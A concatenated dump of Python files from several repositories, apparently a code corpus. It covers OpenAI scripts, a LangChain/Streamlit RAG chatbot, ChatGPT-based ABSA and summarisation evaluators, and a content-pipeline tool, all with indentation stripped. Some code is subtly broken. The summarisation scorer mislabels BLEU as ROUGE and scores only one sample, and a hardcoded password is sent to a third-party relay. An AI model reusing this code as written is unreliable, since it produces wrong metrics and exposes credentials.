with open(remerged_filepath, "w", encoding="utf-8") as f:
f.write(response)
print(f"Saved `{remerged_filepath}`")
else:
print("ERROR - JSON may be truncated or invalid.")
idx += group_size
except KeyboardInterrupt:
print("Stop.")
| [] |
2024-01-10 | francescolonardo/CTF_writeups_NLP_analysis | openai_analysis~02_data_processing~01_openai_generate_writeups_presteps.py | import json
import os
import re
import ast
import openai
def get_response(prompt: str):
response = openai.Completion.create(
model="text-davinci-003", # Replace with the latest GPT-3.5 model name
prompt=prompt,
max_tokens=1000,
)
return response.choices[0].text.strip() # Extract text from GPT-3.5 response
def extract_list_from_response(response_text):
# Use regex to find a list in the response
match = re.search(r"\[\s*\"[^\[\]]*\"\s*(,\s*\"[^\[\]]*\"\s*)*\]", response_text)
if match:
list_str = match.group(0)
try:
return ast.literal_eval(list_str)
except (ValueError, SyntaxError):
print("Error in converting string to list.")
return None
else:
print("No list found in the response.")
return None
def find_original_files_without_presteps():
original_filepaths = []
for dirpath, _, filenames in os.walk("../dataset_writeups"):
for filename in filenames:
if filename.endswith("_original.md"):
original_filepath = os.path.join(dirpath, filename)
presteps_filepath = original_filepath.replace(
"_original.md", "_presteps.json"
)
if not os.path.exists(presteps_filepath):
original_filepaths.append(original_filepath)
return original_filepaths
if __name__ == "__main__":
with open("./api_keys.json", "r", encoding="utf-8") as f:
api_key = json.load(f)["api_key"]
openai.api_key = api_key
with open(
"../prompts/prompt_from_original_to_presteps.txt", "r", encoding="utf-8"
) as f:
base_prompt = f.read()
try:
original_filepaths = find_original_files_without_presteps()
total_files = len(original_filepaths)
for idx, original_filepath in enumerate(original_filepaths, start=1):
with open(original_filepath, "r", encoding="utf-8") as writeup_file:
writeup = writeup_file.read()
prompt = base_prompt + "\n```" + writeup + "```"
print(f"[{idx}/{total_files}] Processing `{original_filepath}`")
try:
response_text = get_response(prompt=prompt)
# print(f"Response: {response_text}")
# First try to parse as JSON
try:
response_json_data = json.loads(response_text)
except json.JSONDecodeError:
response_json_data = None
# If not JSON, try extracting list using regex and ast.literal_eval
if response_json_data is None:
response_json_data = extract_list_from_response(response_text)
if response_json_data is not None:
print("INFO - Data appears to be well-formed and complete.")
presteps_filepath = original_filepath.replace(
"_original.md", "_presteps.json"
)
with open(
presteps_filepath, "w", encoding="utf-8"
) as presteps_file:
json.dump(response_json_data, presteps_file, indent=4)
print(f"Saved `{presteps_filepath}`")
else:
print("ERROR - Could not extract valid data from the response")
except openai.error.InvalidRequestError as e:
print(f"ERROR - OpenAI - {e}")
except KeyboardInterrupt:
print("Stop.")
| [
"PLACEHOLDER\n```PLACEHOLDER```"
] |
2024-01-10 | nimamahmoudi/LLMStreamlitDemoBasic | app-agent.py | import streamlit as st
from langchain.agents import initialize_agent, AgentType
from langchain.callbacks import StreamlitCallbackHandler
from langchain.chat_models import ChatOpenAI
from langchain.prompts import ChatPromptTemplate, MessagesPlaceholder
from llm_helper import get_agent_chain, get_lc_oai_tools
with st.sidebar:
openai_api_key = st.secrets["OPENAI_API_KEY"]
"[Get an OpenAI API key](https://platform.openai.com/account/api-keys)"
"[View the source code](https://github.com/streamlit/llm-examples/blob/main/pages/2_Chat_with_search.py)"
"[](https://codespaces.new/streamlit/llm-examples?quickstart=1)"
st.title("🔎 LangChain - Chat with search")
"""
In this example, we're using `StreamlitCallbackHandler` to display the thoughts and actions of an agent in an interactive Streamlit app.
Try more LangChain 🤝 Streamlit Agent examples at [github.com/langchain-ai/streamlit-agent](https://github.com/langchain-ai/streamlit-agent).
"""
if "messages" not in st.session_state:
st.session_state["messages"] = [
{"role": "assistant", "content": "Hi, I'm a chatbot who can search the web. How can I help you?"}
]
for msg in st.session_state.messages:
st.chat_message(msg["role"]).write(msg["content"])
if prompt := st.chat_input(placeholder="Who won the Women's U.S. Open in 2018?"):
st.session_state.messages.append({"role": "user", "content": prompt})
st.chat_message("user").write(prompt)
if not openai_api_key:
st.info("Please add your OpenAI API key to continue.")
st.stop()
llm = ChatOpenAI(model_name="gpt-3.5-turbo-1106", openai_api_key=openai_api_key, streaming=True)
lc_tools, _ = get_lc_oai_tools()
search_agent = initialize_agent(lc_tools, llm, agent=AgentType.OPENAI_FUNCTIONS, handle_parsing_errors=True, verbose=True)
agent_prompt = ChatPromptTemplate.from_messages(
[
("system", "You are a helpful assistant, use the search tool to answer the user's question and cite only the page number when you use information coming (like [p1]) from the source document. Always use the content from the source document to answer the user's question. If you need to compare multiple subjects, search them one by one."),
("user", "{input}"),
MessagesPlaceholder(variable_name="agent_scratchpad"),
]
)
search_agent.agent.prompt = agent_prompt
with st.chat_message("assistant"):
st_cb = StreamlitCallbackHandler(st.container(), expand_new_thoughts=False)
response = search_agent.run(prompt, callbacks=[st_cb])
# search_agent = get_agent_chain(callbacks=[st_cb])
# response = search_agent.invoke({"input": prompt})
# response = response["output"]
st.session_state.messages.append({"role": "assistant", "content": response})
st.write(response)
| [
"You are a helpful assistant, use the search tool to answer the user's question and cite only the page number when you use information coming (like [p1]) from the source document. Always use the content from the source document to answer the user's question. If you need to compare multiple subjects, search them one by one.",
"agent_scratchpad",
"Hi, I'm a chatbot who can search the web. How can I help you?",
"{input}"
] |
2024-01-10 | nimamahmoudi/LLMStreamlitDemoBasic | llm_helper.py | from typing import Optional
# langchain imports
from langchain.chat_models import ChatOpenAI
from langchain.schema.runnable import RunnableMap
from langchain.prompts.prompt import PromptTemplate
from langchain.prompts import ChatPromptTemplate
from langchain.schema.runnable import RunnablePassthrough
from langchain.schema.output_parser import StrOutputParser
from operator import itemgetter
from langchain.schema.messages import HumanMessage, SystemMessage, AIMessage
from langchain.callbacks.streamlit.streamlit_callback_handler import StreamlitCallbackHandler
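# Serialize retrieved documents into a lightweight XML-like block (escaped content plus metadata tags) for prompting.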
def format_docs(docs):
res = ""
# res = str(docs)
for doc in docs:
escaped_page_content = doc.page_content.replace("\n", "\\n")
res += "<doc>\n"
res += f" <content>{escaped_page_content}</content>\n"
for m in doc.metadata:
res += f" <{m}>{doc.metadata[m]}</{m}>\n"
res += "</doc>\n"
return res
def get_search_index(file_name="Mahmoudi_Nima_202202_PhD.pdf", index_folder="index"):
# load embeddings
from langchain.vectorstores import FAISS
from langchain.embeddings.openai import OpenAIEmbeddings
search_index = FAISS.load_local(
folder_path=index_folder,
index_name=file_name + ".index",
embeddings=OpenAIEmbeddings(),
)
return search_index
def convert_message(m):
if m["role"] == "user":
return HumanMessage(content=m["content"])
elif m["role"] == "assistant":
return AIMessage(content=m["content"])
elif m["role"] == "system":
return SystemMessage(content=m["content"])
else:
raise ValueError(f"Unknown role {m['role']}")
_condense_template = """Given the following conversation and a follow up question, rephrase the follow up question to be a standalone question, in its original language.
Chat History:
{chat_history}
Follow Up Input: {input}
Standalone question:"""
CONDENSE_QUESTION_PROMPT = PromptTemplate.from_template(_condense_template)
_rag_template = """Answer the question based only on the following context, citing the page number(s) of the document(s) you used to answer the question:
{context}
Question: {question}
"""
ANSWER_PROMPT = ChatPromptTemplate.from_template(_rag_template)
def _format_chat_history(chat_history):
def format_single_chat_message(m):
if type(m) is HumanMessage:
return "Human: " + m.content
elif type(m) is AIMessage:
return "Assistant: " + m.content
elif type(m) is SystemMessage:
return "System: " + m.content
else:
raise ValueError(f"Unknown role {m['role']}")
return "\n".join([format_single_chat_message(m) for m in chat_history])
def get_standalone_question_from_chat_history_chain():
_inputs = RunnableMap(
standalone_question=RunnablePassthrough.assign(
chat_history=lambda x: _format_chat_history(x["chat_history"])
)
| CONDENSE_QUESTION_PROMPT
| ChatOpenAI(temperature=0)
| StrOutputParser(),
)
return _inputs
def get_rag_chain(file_name="Mahmoudi_Nima_202202_PhD.pdf", index_folder="index", retrieval_cb=None):
vectorstore = get_search_index(file_name, index_folder)
retriever = vectorstore.as_retriever()
if retrieval_cb is None:
retrieval_cb = lambda x: x
def context_update_fn(q):
retrieval_cb([q])
return q
_inputs = RunnableMap(
standalone_question=RunnablePassthrough.assign(
chat_history=lambda x: _format_chat_history(x["chat_history"])
)
| CONDENSE_QUESTION_PROMPT
| ChatOpenAI(temperature=0)
| StrOutputParser(),
)
_context = {
"context": itemgetter("standalone_question") | RunnablePassthrough(context_update_fn) | retriever | format_docs,
"question": lambda x: x["standalone_question"],
}
conversational_qa_chain = _inputs | _context | ANSWER_PROMPT | ChatOpenAI()
return conversational_qa_chain
# RAG fusion chain
# source1: https://youtu.be/GchC5WxeXGc?si=6i7J0rPZI7SNwFYZ
# source2: https://towardsdatascience.com/forget-rag-the-future-is-rag-fusion-1147298d8ad1
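# Reciprocal Rank Fusion: each document scores sum(1 / (rank + k)) across all ranked lists, then results are re-sorted by that fused score.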
def reciprocal_rank_fusion(results: list[list], k=60):
from langchain.load import dumps, loads
fused_scores = {}
for docs in results:
# Assumes the docs are returned in sorted order of relevance
for rank, doc in enumerate(docs):
doc_str = dumps(doc)
if doc_str not in fused_scores:
fused_scores[doc_str] = 0
fused_scores[doc_str] += 1 / (rank + k)
reranked_results = [
(loads(doc), score)
for doc, score in sorted(fused_scores.items(), key=lambda x: x[1], reverse=True)
]
return reranked_results
def get_search_query_generation_chain():
from langchain.prompts import SystemMessagePromptTemplate, HumanMessagePromptTemplate
prompt = ChatPromptTemplate(
input_variables=['original_query'],
messages=[
SystemMessagePromptTemplate(
prompt=PromptTemplate(
input_variables=[],
template='You are a helpful assistant that generates multiple search queries based on a single input query.'
)
),
HumanMessagePromptTemplate(
prompt=PromptTemplate(
input_variables=['original_query'],
template='Generate multiple search queries related to: {original_query} \n OUTPUT (4 queries):'
)
)
]
)
generate_queries = (
prompt |
ChatOpenAI(temperature=0) |
StrOutputParser() |
(lambda x: x.split("\n"))
)
return generate_queries
def get_rag_fusion_chain(file_name="Mahmoudi_Nima_202202_PhD.pdf", index_folder="index", retrieval_cb=None):
vectorstore = get_search_index(file_name, index_folder)
retriever = vectorstore.as_retriever()
query_generation_chain = get_search_query_generation_chain()
_inputs = RunnableMap(
standalone_question=RunnablePassthrough.assign(
chat_history=lambda x: _format_chat_history(x["chat_history"])
)
| CONDENSE_QUESTION_PROMPT
| ChatOpenAI(temperature=0)
| StrOutputParser(),
)
if retrieval_cb is None:
retrieval_cb = lambda x: x
_context = {
"context":
RunnablePassthrough.assign(
original_query=lambda x: x["standalone_question"]
)
| query_generation_chain
| retrieval_cb
| retriever.map()
| reciprocal_rank_fusion
| (lambda x: [item[0] for item in x])
| format_docs,
"question": lambda x: x["standalone_question"],
}
conversational_qa_chain = _inputs | _context | ANSWER_PROMPT | ChatOpenAI()
return conversational_qa_chain
####################
# Adding agent chain with OpenAI function calling
def get_search_tool_from_index(search_index, st_cb: Optional[StreamlitCallbackHandler] = None, ):
from langchain.agents import tool
from agent_helper import retry_and_streamlit_callback
@tool
@retry_and_streamlit_callback(st_cb=st_cb, tool_name="Content Seach Tool")
def search(query: str) -> str:
"""Search the contents of the source document for the queries."""
docs = search_index.similarity_search(query, k=5)
return format_docs(docs)
return search
def get_lc_oai_tools(file_name:str = "Mahmoudi_Nima_202202_PhD.pdf", index_folder: str = "index", st_cb: Optional[StreamlitCallbackHandler] = None, ):
from langchain.tools.render import format_tool_to_openai_tool
search_index = get_search_index(file_name, index_folder)
lc_tools = [get_search_tool_from_index(search_index=search_index, st_cb=st_cb)]
oai_tools = [format_tool_to_openai_tool(t) for t in lc_tools]
return lc_tools, oai_tools
def get_agent_chain(file_name="Mahmoudi_Nima_202202_PhD.pdf", index_folder="index", callbacks=None, st_cb: Optional[StreamlitCallbackHandler] = None, ):
if callbacks is None:
callbacks = []
from langchain.agents import initialize_agent, AgentType
from langchain.prompts import ChatPromptTemplate, MessagesPlaceholder
from langchain.agents.format_scratchpad.openai_tools import (
format_to_openai_tool_messages,
)
from langchain.agents import AgentExecutor
from langchain.agents.output_parsers.openai_tools import OpenAIToolsAgentOutputParser
lc_tools, oai_tools = get_lc_oai_tools(file_name, index_folder, st_cb)
prompt = ChatPromptTemplate.from_messages(
[
("system", "You are a helpful assistant, use the search tool to answer the user's question and cite only the page number when you use information coming (like [p1]) from the source document.\nchat history: {chat_history}"),
("user", "{input}"),
MessagesPlaceholder(variable_name="agent_scratchpad"),
]
)
llm = ChatOpenAI(temperature=0, model="gpt-3.5-turbo-1106")
agent = (
{
"input": lambda x: x["input"],
"agent_scratchpad": lambda x: format_to_openai_tool_messages(
x["intermediate_steps"]
),
"chat_history": lambda x: _format_chat_history(x["chat_history"]),
}
| prompt
| llm.bind(tools=oai_tools)
| OpenAIToolsAgentOutputParser()
)
agent_executor = AgentExecutor(agent=agent, tools=lc_tools, verbose=True, callbacks=callbacks)
return agent_executor
if __name__ == "__main__":
question_generation_chain = get_search_query_generation_chain()
print('='*50)
print('RAG Chain')
chain = get_rag_chain()
print(chain.invoke({'input': 'serverless computing', 'chat_history': []}))
print('='*50)
print('Question Generation Chain')
print(question_generation_chain.invoke({'original_query': 'serverless computing'}))
print('-'*50)
print('RAG Fusion Chain')
chain = get_rag_fusion_chain()
print(chain.invoke({'input': 'serverless computing', 'chat_history': []}))
agent_executor = get_agent_chain()
print(
agent_executor.invoke({
"input": "based on the source document, compare FaaS with BaaS??",
"chat_history": [],
})
)
| [
"original_query",
"You are a helpful assistant, use the search tool to answer the user's question and cite only the page number when you use information coming (like [p1]) from the source document.\nchat history: {chat_history}",
"{input}",
"Answer the question based only on the following context, citing the page number(s) of the document(s) you used to answer the question:\n{context}\n\nQuestion: {question}\n",
"Given the following conversation and a follow up question, rephrase the follow up question to be a standalone question, in its original language.\n\nChat History:\n{chat_history}\nFollow Up Input: {input}\nStandalone question:",
"agent_scratchpad",
"You are a helpful assistant that generates multiple search queries based on a single input query.",
"Generate multiple search queries related to: {original_query} \n OUTPUT (4 queries):",
"Search the contents of the source document for the queries.",
"content"
] |
2024-01-10 | nimamahmoudi/LLMStreamlitDemoBasic | app-agent2.py | import streamlit as st
from langchain.agents import initialize_agent, AgentType
from langchain.callbacks import StreamlitCallbackHandler
from langchain.chat_models import ChatOpenAI
from langchain.prompts import ChatPromptTemplate, MessagesPlaceholder
from langchain.agents.format_scratchpad import format_to_openai_function_messages
from langchain.agents.output_parsers import OpenAIFunctionsAgentOutputParser
from llm_helper import get_agent_chain, get_lc_oai_tools, convert_message
from langchain.agents import AgentExecutor
with st.sidebar:
openai_api_key = st.secrets["OPENAI_API_KEY"]
"[Get an OpenAI API key](https://platform.openai.com/account/api-keys)"
"[View the source code](https://github.com/streamlit/llm-examples/blob/main/pages/2_Chat_with_search.py)"
"[](https://codespaces.new/streamlit/llm-examples?quickstart=1)"
st.title("🔎 LangChain - Chat with search")
"""
In this example, we're using `StreamlitCallbackHandler` to display the thoughts and actions of an agent in an interactive Streamlit app.
Try more LangChain 🤝 Streamlit Agent examples at [github.com/langchain-ai/streamlit-agent](https://github.com/langchain-ai/streamlit-agent).
"""
if "messages" not in st.session_state:
st.session_state["messages"] = [
{"role": "assistant", "content": "Hi, I'm a chatbot who can search the web. How can I help you?"}
]
for msg in st.session_state.messages:
st.chat_message(msg["role"]).write(msg["content"])
if prompt := st.chat_input(placeholder="Who won the Women's U.S. Open in 2018?"):
st.session_state.messages.append({"role": "user", "content": prompt})
st.chat_message("user").write(prompt)
if not openai_api_key:
st.info("Please add your OpenAI API key to continue.")
st.stop()
if "messages" in st.session_state:
chat_history = [convert_message(m) for m in st.session_state.messages[:-1]]
else:
chat_history = []
with st.chat_message("assistant"):
st_cb = StreamlitCallbackHandler(st.container(), expand_new_thoughts=False)
agent = get_agent_chain(st_cb=st_cb)
response = agent.invoke({
"input": prompt,
"chat_history": chat_history,
})
response = response["output"]
st.session_state.messages.append({"role": "assistant", "content": response})
st.write(response)
| [
"Hi, I'm a chatbot who can search the web. How can I help you?"
] |
2024-01-10 | nimamahmoudi/LLMStreamlitDemoBasic | embed_pdf.py | from langchain.document_loaders import PagedPDFSplitter
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.vectorstores import FAISS
import os
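# Load a PDF page by page, split it into overlapping text chunks, embed them with OpenAI, and save a FAISS index to disk.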
def embed_document(file_name, file_folder="pdf", embedding_folder="index"):
file_path = f"{file_folder}/{file_name}"
loader = PagedPDFSplitter(file_path)
source_pages = loader.load_and_split()
embedding_func = OpenAIEmbeddings()
text_splitter = RecursiveCharacterTextSplitter(
chunk_size=500,
chunk_overlap=100,
length_function=len,
is_separator_regex=False,
separators=["\n\n", "\n", " ", ""],
)
source_chunks = text_splitter.split_documents(source_pages)
search_index = FAISS.from_documents(source_chunks, embedding_func)
search_index.save_local(
folder_path=embedding_folder, index_name=file_name + ".index"
)
def embed_all_pdf_docs():
# Define the directory path
pdf_directory = "pdf"
# Check if the directory exists
if os.path.exists(pdf_directory):
# List all PDF files in the directory
pdf_files = [
file for file in os.listdir(pdf_directory) if file.endswith(".pdf")
]
if pdf_files:
for pdf_file in pdf_files:
print(f"Embedding {pdf_file}...")
embed_document(file_name=pdf_file, file_folder=pdf_directory)
print("Done!")
else:
raise Exception("No PDF files found in the directory.")
else:
raise Exception(f"Directory '{pdf_directory}' does not exist.")
def get_all_index_files():
# Define the directory path
index_directory = "index"
# Check if the directory exists
if os.path.exists(index_directory):
# List all index files in the directory
postfix = ".index.faiss"
index_files = [
file.replace(postfix, "")
for file in os.listdir(index_directory)
if file.endswith(postfix)
]
if index_files:
return index_files
else:
raise Exception("No index files found in the directory.")
else:
raise Exception(f"Directory '{index_directory}' does not exist.")
| [] |
2024-01-10 | nimamahmoudi/LLMStreamlitDemoBasic | agent_helper.py | # from langchain.callbacks import StreamlitCallbackHandler
from langchain.callbacks.streamlit.streamlit_callback_handler import StreamlitCallbackHandler
from tenacity import retry, wait_exponential, stop_after_attempt
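# Class factory: subclasses a tool class so its run() reports start/end to the Streamlit callback handler and retries with exponential backoff.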
def bind_logger(toolClass):
class newToolClass(toolClass):
def __init__(self, tool_name: str, st_cb: StreamlitCallbackHandler, *args, **kwargs):
super().__init__(*args, **kwargs)
self.st_cb = st_cb
self.tool_name = tool_name
def run(self, *args, **kwargs):
print(f"Running {toolClass.__name__} {[*args]}, {kwargs}")
if self.st_cb._current_thought is None:
self.st_cb.on_llm_start({}, [])
args_str = ' '.join(args) + ' ' + ' '.join([f'{k}=`{v}`' for k, v in kwargs.items()])
self.st_cb.on_tool_start({'name': self.tool_name}, args_str)
try:
ret_val = retry(
wait=wait_exponential(min=2, max=20),
stop=stop_after_attempt(5),
)(super().run)(*args, **kwargs)
self.st_cb.on_tool_end(ret_val)
return ret_val
except Exception as e:
original_exception = e.last_attempt.result()
print(f"Exception {original_exception} in {toolClass.__name__} {[*args]}, {kwargs}")
raise original_exception
return newToolClass
from functools import wraps
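# Decorator factory: wraps a tool function with Streamlit callback start/end events and exponential-backoff retries (up to 5 attempts).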
def retry_and_streamlit_callback(st_cb: StreamlitCallbackHandler, tool_name: str):
if st_cb is None:
return lambda x: x
def decorator(tool_func):
@wraps(tool_func)
def decorated_func(*args, **kwargs):
print(f"Running {tool_name} {args}, {kwargs}")
if st_cb._current_thought is None:
st_cb.on_llm_start({}, [])
args_str = ' '.join(args) + ' ' + ' '.join([f'{k}=`{v}`' for k, v in kwargs.items()])
st_cb.on_tool_start({'name': tool_name}, args_str)
@retry(wait=wait_exponential(min=2, max=20), stop=stop_after_attempt(5))
def retry_wrapper():
return tool_func(*args, **kwargs)
try:
ret_val = retry_wrapper()
st_cb.on_tool_end(ret_val)
return ret_val
except Exception as e:
print(f"Exception {e} in {tool_name} {args}, {kwargs}")
raise e
return decorated_func
return decorator
| [] |
2024-01-10 | yangheng95/InstOptima | models~generative_summarization~chagpt.py | import os
import shutil
import warnings
from .instruction import SumInstruction
warnings.filterwarnings("ignore")
import pandas as pd
from .data_utils import read_text
def train_sum(epoch, instruction, example, **kwargs):
task_name = "generative_summarization"
experiment_name = kwargs.get("dataset")
model_checkpoint = kwargs.get("plm")
# model_checkpoint = "google/flan-t5-small"
print("Experiment Name: ", experiment_name)
model_out_path = "checkpoints"
model_out_path = os.path.join(
model_out_path,
task_name,
f"{model_checkpoint.replace('/', '')}-{experiment_name}",
)
print("Model output path: ", model_out_path)
id_train_file_path = kwargs.get("dataset")
id_test_file_path = kwargs.get("dataset")
id_tr_df = read_text(id_train_file_path, "train")
id_te_df = read_text(id_test_file_path, "test")
id_tr_df = pd.DataFrame(id_tr_df)
id_te_df = pd.DataFrame(id_te_df)
def chat(prompt, **kwargs):
params = {"prompt": None, "message_history": None, "password": "Password!"}
chatter_url = "https://chatter.pagekite.me/chat"
import requests
import time
params.update(
{
"prompt": prompt,
"system_prompt": "You are ChatGPT, a chatbot that uses the GPT-3 language model from OpenAI to answer questions about the world.",
"message_history": '[]',
"tag": "EvoPrompt-" + kwargs.get("dataset", "absa-chagpt-ablation-no-instructions"),
}
)
try:
response = requests.post(chatter_url, params=params, timeout=600)
if "error" in response.json():
print(response.json())
time.sleep(5)
return chat(prompt)
if response.status_code != 200:
print(response.status_code)
print(response.text)
time.sleep(5)
return chat(prompt)
return response.json()["response"], response.json()["message_history"]
except Exception as e:
print(e)
time.sleep(5)
return chat(prompt)
for batch in id_te_df.sample(100).to_dict(orient="records"):
reference_summaries = []
generated_summaries = []
prompt = SumInstruction().prepare_input(batch['text'])
response, _ = chat(prompt, **kwargs)
generated_summaries.append(response)
reference_summaries.append([batch['label']])
from nltk.translate.bleu_score import sentence_bleu
bleu_scores1 = []
bleu_scores2 = []
bleu_scores3 = []
for i in range(len(generated_summaries)):
bleu_scores1.append(sentence_bleu(reference_summaries[i], generated_summaries[i], weights=(1, 0, 0, 0)))
bleu_scores2.append(sentence_bleu(reference_summaries[i], generated_summaries[i], weights=(0, 1, 0, 0)))
bleu_scores3.append(sentence_bleu(reference_summaries[i], generated_summaries[i], weights=(0, 0, 1, 0)))
metrics = {
"rouge-1": sum(bleu_scores1) / len(bleu_scores1),
"rouge-2": sum(bleu_scores2) / len(bleu_scores2),
"rouge-3": sum(bleu_scores3) / len(bleu_scores3),
}
# # Compute Metrics
# metrics = t5_exp.get_metrics(id_tr_labels, id_tr_pred_labels)
# print('----------------------- Training Set Metrics -----------------------')
# print(metrics)
#
# metrics = t5_exp.get_metrics(id_te_labels, id_te_pred_labels)
# print('----------------------- Testing Set Metrics -----------------------')
# print(metrics)
# # Compute Metrics
# metrics = t5_exp.get_classic_metrics(id_tr_labels, id_tr_pred_labels)
# print("----------------------- Classic Training Set Metrics -----------------------")
# print(metrics)
print("----------------------- Classic Testing Set Metrics -----------------------")
print(metrics)
try:
shutil.rmtree("checkpoints")
except:
pass
return metrics
| [] |
2024-01-10 | yangheng95/InstOptima | models~aspect_based_sentiment_analysis~chagpt.py | import os
import shutil
import warnings
warnings.filterwarnings("ignore")
import pandas as pd
from .data_utils import read_json
def train_absa(epoch, instruction, example, **kwargs):
task_name = "aspect_based_sentiment_analysis"
experiment_name = kwargs.get("dataset")
model_checkpoint = kwargs.get("plm")
# model_checkpoint = "google/flan-t5-small"
print("Experiment Name: ", experiment_name)
model_out_path = "checkpoints"
model_out_path = os.path.join(
model_out_path,
task_name,
f"{model_checkpoint.replace('/', '')}-{experiment_name}",
)
print("Model output path: ", model_out_path)
id_train_file_path = kwargs.get("dataset")
id_test_file_path = kwargs.get("dataset")
id_tr_df = read_json(id_train_file_path, "train")
id_te_df = read_json(id_test_file_path, "test")
id_tr_df = pd.DataFrame(id_tr_df)
id_te_df = pd.DataFrame(id_te_df)
def chat(prompt, **kwargs):
params = {"prompt": None, "message_history": None, "password": "Password!"}
chatter_url = "https://chatter.pagekite.me/chat"
import requests
import time
params.update(
{
"prompt": prompt,
"system_prompt": "You are ChatGPT, a chatbot that uses the GPT-3 language model from OpenAI to answer questions about the world.",
"message_history": '[]',
"tag": "EvoPrompt-" + kwargs.get("dataset", "absa-chagpt-ablation-no-instructions"),
}
)
try:
response = requests.post(chatter_url, params=params, timeout=600)
if "error" in response.json():
print(response.json())
time.sleep(5)
return chat(prompt)
if response.status_code != 200:
print(response.status_code)
print(response.text)
time.sleep(5)
return chat(prompt)
return response.json()["response"], response.json()["message_history"]
except Exception as e:
print(e)
time.sleep(5)
return chat(prompt)
num_total = 0
num_acc = 0
for batch in id_te_df.sample(100).to_dict(orient="records"):
print(batch)
print(batch['text'])
print(batch['labels'])
for label in batch['labels']:
if label['aspect'] != 'NULL':
prompt = f"{instruction}\n Examples: {example}\n what is the sentiment for {label['aspect']} in the following text: {batch['text']}?\n\n"
response, _ = chat(prompt, **kwargs)
print(response)
if label['polarity'].lower() in response.lower():
num_acc += 1
num_total += 1
print(num_acc / num_total)
metrics = {'accuracy': num_acc / num_total}
# # Compute Metrics
# metrics = t5_exp.get_metrics(id_tr_labels, id_tr_pred_labels)
# print('----------------------- Training Set Metrics -----------------------')
# print(metrics)
#
# metrics = t5_exp.get_metrics(id_te_labels, id_te_pred_labels)
# print('----------------------- Testing Set Metrics -----------------------')
# print(metrics)
# # Compute Metrics
# metrics = t5_exp.get_classic_metrics(id_tr_labels, id_tr_pred_labels)
# print("----------------------- Classic Training Set Metrics -----------------------")
# print(metrics)
print("----------------------- Classic Testing Set Metrics -----------------------")
print(metrics)
try:
shutil.rmtree("checkpoints")
except:
pass
return metrics
| [
"PLACEHOLDER\n Examples: PLACEHOLDER\n what is the sentiment for PLACEHOLDER in the following text: PLACEHOLDER?\n\n"
] |
2024-01-10 | LandonJPGinn/resume_code_examples | projects~CreatorPipeline~_openai.py | from pathlib import Path
import openai
import requests
from CreatorPipeline.constants import PLATFORMS, PROMPTS
openai.api_key = PLATFORMS.openai.get("OPENAI_KEY")
def generate_text(prompt, output=None):
"""Generates text from a prompt using the OpenAI API."""
response = openai.Completion.create(
model="text-davinci-003", prompt=prompt, max_tokens=2000
)
if not output:
return response.choices[0].text
with open(output, "w") as f:
f.write(response.choices[0].text)
def generate_image(prompt, n, output=None):
"""Generates images from a prompt using the OpenAI API."""
response = openai.Image.create(prompt=prompt, n=n, size="1024x1024")
image_urls = response["data"][0]["url"]
if not output:
return image_urls
for i, pic in enumerate(image_urls):
pic_path = Path(f"{output}") / f"thumbnail_component_{i:04d}.png"
save_image(pic_url=pic, output=pic_path)
def transcribe_audio(fp, output=None):
"""Transcribes audio from a file using the OpenAI API."""
print(help(openai.Audio.transcribe))
with open(fp, "rb") as f:
response = openai.Audio.transcribe(model="whisper-1", file=f)
if response:
print(response)
return response
def translate_audio(file, lang="English", output=None):
"""Translates audio from a file using the OpenAI API."""
openai.Audio.translate(model="whisper-1", file=file, language=lang)
def save_image(pic_url, output):
"""Saves an image from a url to a file."""
with open(output, "wb") as handle:
response = requests.get(pic_url, stream=True)
if not response.ok:
print(response)
for block in response.iter_content(1024):
if not block:
break
handle.write(block)
# received from db
params = {
"SUBJECT": "Landing Your First Job",
"GAIN": "Know how to confidently get a first job opportunity.",
}
params = {
"SUBJECT": "",
"GAIN": "",
"TITLE": "",
"RELEASE_DATE": "",
"VIDEO1": "", # choice from options
"VIDEO2": "", # choice from options
}
# Define might need a step first to set the gain desired?
# or maybe the clarity can be suggested?
# maybe its just manual
def generate_episode_ai_content(params, episode_root=None):
"""Generates AI content for an episode."""
print("\nGenerating AI Content")
episode_root = Path(episode_root)
# to 03_script/script.txt
generate_text(
PROMPTS.script_outline.substitute(**params),
episode_root / "03_script/script.txt",
)
# to 02_research/components/thumb
generate_image(
PROMPTS.thumbnail_components.substitute(**params),
PROMPTS.thumbnail_component_count,
episode_root / "02_research/components/thumb",
)
# to 07_release/community
generate_text(
PROMPTS.community.substitute(**params),
episode_root / "07_release/community/community.txt",
)
# to 07_release/emails
generate_text(
PROMPTS.email_chain.substitute(**params),
episode_root / "07_release/emails/email_pre.txt",
)
# to 08_market/socials
generate_text(
PROMPTS.channel_article.substitute(**params),
episode_root / "08_market/socials/article.txt",
)
# to 08_market/emails
generate_text(
PROMPTS.blog_post.substitute(**params),
episode_root / "08_market/emails/emails_post.txt",
)
print("\nDone Generating AI Content\n")
def generate_closed_captions(audio_file, output=None):
"""Generates closed captions for an audio file."""
transcribe_audio(audio_file, output)
# for lang in PROMPTS.languages:
# translate_audio(audio_file, lang, output)
| [] |
2024-01-10 | LandonJPGinn/resume_code_examples | projects~CreatorPipeline~_phase_initialize.py | # Start a new episode - from an Episode listed already in the Database.
# This is not an episode idea command
import argparse
import sys
from pathlib import Path
import json
import re
from CreatorPipeline import _openai as oai
from CreatorPipeline.constants import DEFAULTS, PROMPTS, STATUS
from CreatorPipeline.directory import create_episode_directory
from CreatorPipeline.episode import Episode
from CreatorPipeline.database import ActiveEpisodeDatabase
class PhaseBuild:
"""Build out dependencies for a phase step. Currently simple, may need to be more complex later"""
def __init__(self, episode):
self.episode = [episode]
initialize_episodes(self.episode)
def initialize_episodes(episodes):
"""Initialize a episodes from the database into folders"""
selected_episodes = []
for episode in episodes:
# episode_id = episode.get("ID")
if not isinstance(episode, Episode):
current_episode = Episode(episode)
else:
current_episode = episode
if not current_episode:
print(
f"{episode} failed to find an Episode. Make sure the hash provided is in the database.\nStopping"
)
sys.exit()
selected_episodes.append(current_episode)
# confirmation block
print("You have selected the following: ")
[ep.summarize() for ep in selected_episodes]
print("\n\nContinue?")
resp = input("Y/n")
if resp.lower() != "y":
print("cancelling...")
sys.exit()
for episode in selected_episodes:
# ensure that the episode row contains values for:
"""
Keyword Phrase
Tactic
Gain
Avatar
Method
Format
Playlist
All sheet columns G:N
"""
exceptions = ("VideoID", "Thumb_Text", "next_video_id","Status")
for k, v in episode.__dict__.items():
print(f"{k}: {v}")
if k in exceptions:
continue
assert v, f"No Value found for {k}. Fill out Episode first in Sheet."
directory = create_episode_directory(episode)
print(directory)
assert directory, f"{directory} is not a valid directory"
openai_initial(episode_root=directory, episode=episode)
episode.change_status(STATUS.start)
